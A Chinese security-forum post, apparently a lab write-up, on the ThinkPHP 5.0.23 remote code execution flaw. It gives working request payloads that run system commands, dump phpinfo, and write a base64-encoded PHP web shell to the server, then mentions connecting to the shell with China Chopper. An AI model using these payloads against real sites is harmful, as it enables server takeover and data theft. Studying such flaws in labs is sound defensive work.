安全矩阵

 找回密码
 立即注册
搜索
查看: 3203|回复: 0

Thinkphp5.0.23 远程代码执行

[复制链接]

30

主题

60

帖子

447

积分

中级会员

Rank: 3Rank: 3

积分
447
发表于 2020-8-11 16:31:13 | 显示全部楼层 |阅读模式
Thinkphp5.0.23 远程代码执行

1. 漏洞概述低于5.0.23版本都存在远程代码执行
write up首先打开靶场
利用POC来拿flag
  1. <font size="4" face="宋体">_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls /tmp</font>
复制代码
使用phpinfo函数验证来获取敏感信息
  1. <font size="4" face="宋体">_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1</font>
复制代码
如果要上传 shell ,传 shell 的时候,要 把 eval 替换成 assert 并进行base64转义。对
aaa<?php @assert($_POST['xss']);?>bbb 进行base64转义,
转义完成后的POC
  1. <font size="4" face="宋体">_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWFhPD9waHAgQGFzc2VydCgkX1BPU1RbJ3hzcyddKTs/PmJiYg== | base64 -d > shell1.php</font>
复制代码
成功访问,说明上传成功。
用菜刀去连接。
接上来上大招,一键日站。





回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-27 23:35 , Processed in 0.013043 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表